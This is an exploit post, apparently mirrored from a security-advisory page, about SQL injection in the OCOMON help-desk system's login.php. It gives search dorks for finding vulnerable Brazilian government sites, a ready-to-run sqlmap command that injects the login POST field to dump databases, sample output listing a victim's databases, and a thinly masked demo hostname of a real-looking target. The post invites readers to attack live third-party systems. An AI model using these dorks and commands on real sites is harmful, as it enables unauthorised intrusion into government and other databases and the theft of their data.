Home / os / wince

OCOMON Sql Injection Via POST

Posted on 30 November -0001

<HTML><HEAD><TITLE>OCOMON Sql Injection Via POST</TITLE><META http-equiv="Content-Type" content="text/html; charset=utf-8"></HEAD><BODY>~ OCOMON Sql Injection Vulnerable: ~ %[JonatasFil DKR]% - OCOMON are vulnerable to Bypass Sqli, {https://cxsecurity.com/issue/WLB-2016080175} - And recently discovered a method of doing sqli injection via post using sqlmap. ------------------------------------------------------ [+] Vuln Directory: /ocomon/includes/common/login.php ------------------------------------------------------ - Ok, First you have to find out if the site has the file login.php and it is vuln. ------------------------------------------------------------------------------------ [+] Dork:inurl:"ocomon" site:gov.br [+] Dork:inurl:"ocomon" site:br ----------------------------------------------------- - After finding a site with the system vulnerable: ----------------------- [+] Download Sqlmap: [+] http://sqlmap.org/ ----------------------- - and go exploit. ------------------------------------------------------------------------------------ [XPL] "sqlmap -u http://www.{site}/ocomon/includes/common/login.php --data"=login=" --dbs --random-agent" ------------------------------------------------------------------------------------- - After that just list the tables. ------------------------- available databases [7]: [*] emater [*] forum [*] information_schema [*] mysql [*] ocomon_rc6 [*] phpmyadmin [*] wordpress --------------------------- [+] DEMO: wwXw.emaXter.pXa.goXv.bXr ~ Enjoy :D</BODY></HTML>

 

TOP